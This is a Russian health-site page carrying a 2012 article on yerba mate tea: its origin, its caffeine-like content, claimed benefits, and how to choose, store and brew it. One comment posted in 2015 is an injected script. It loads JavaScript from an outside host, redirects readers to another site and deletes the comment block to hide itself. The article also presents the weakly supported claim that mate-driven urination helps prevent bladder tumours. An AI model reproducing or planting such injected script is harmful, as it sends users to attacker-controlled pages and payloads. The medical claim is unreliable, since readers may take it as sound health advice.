Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Экзотический напиток: мат...  >>  Экзотический напиток: мате
 
Обратная связь
 

Экзотический напиток: мате

Размер шрифта
19 марта 2012 10:00
  • google_analytics: false
  • Нравится

Как в любой экзотике, в мате нужно разобраться. Так ли полезен этот напиток, как утверждают в Южной Америке, и стоит ли его пить по старинному обычаю индейцев?

1

Сырье для напитка мате производят из листьев и молодых побегов падуба парагвайского – дерева родом из Южной Америки, которое поначалу произрастало в диком виде, а сейчас его культивируют.

Напитку мате много веков. Издавна его употребляли индейцы, однако, его производство и культура потребления в Европе насчитывает всего пару столетий.

Листья и побеги этого дерева содержат особое вещество матеин, которое по своему химическому строению сходно со всем известным кофеином. В любом случае, этот напиток насыщен активизирующим организм человека веществом.

Полезные свойства

Для здорового человека употребление этого напитка полезно. Как любой напиток, содержащий кофеин, мате стимулирует работу сердечно-сосудистой и нервной систем: учащается пульс, повышается давление, активизируется работа мозга и общий тонус организма. Помимо этого повышаются и обменные процессы, за счет чего количество жира уменьшается. Также кофеин тормозит действие антидиуретического гормона, который препятствует выделению мочи, поэтому употребление мате способствует стимуляции диуреза (производству мочи) и более частому мочеиспусканию, что полезно для профилактики опухолей мочевого пузыря.

Кофеин помогает активности организма человека, если он здоров, а например, людям с нарушениями ритма сердца кофеин вреден.

Пьедестал почета по содержанию кофеина

Мате – до 85 мг / 100 г
Черный чай – 50 мг / 100 г
Зеленый чай – 40 мг/ 100 г

Как выбрать

Мате продается в виде мелко нарезанной смеси из листьев и молодых побегов. От объема добавленных в смесь листьев зависит мягкость напитка – чем листьев больше, тем чай мягче.

Лучший чай мате производится в Южной Америке. Добавки в виде ароматизаторов – дело вкуса, но они, в результате, никак не влияют на свойства напитка.

Выбирайте мате по цвету. Ярко-зеленый цвет говорит о том, что это неферментированная (свежее высушенная) субстанция. Когда производят мате, смесь из листьев и побегов выдерживают в холщовых мешках то придание ему бледного цвета. Поэтому яркий цвет мате не означает его лучшее качество.

Как хранить

Хранить мате нужно в плотно закрытой, т.е. герметичной, керамической банке. Это идеальный способ хранения, потому что чай не должен впитывать воду и терять аромат. Срок хранения: не больше 2-х лет.

Как приготовить

Как заварить и выпить мате? Питие мате имеет долгую традицию.

Для заваривания мате существует специальный сосуд – калебас, а пьют мате через трубочку бомбилью. Однако нужно помнить, что калебас – это сосуд из тыквы, т.е. органической природы. Поэтому там легко может завестись плесень, а это, как известно, чревато последствиями для человека. Заваривайте мате в простом чайнике и пейте этот напиток из обычной кружки.

Мате заваривается как обычный зеленый чай. Заваривать его можно несколько раз, но до тех пор, пока он пенится при добавлении кипятка – значит из мате экстрагируются (извлекаются) полезные вещества.

 


Сюжеты по теме:
Чай мате

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:49

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.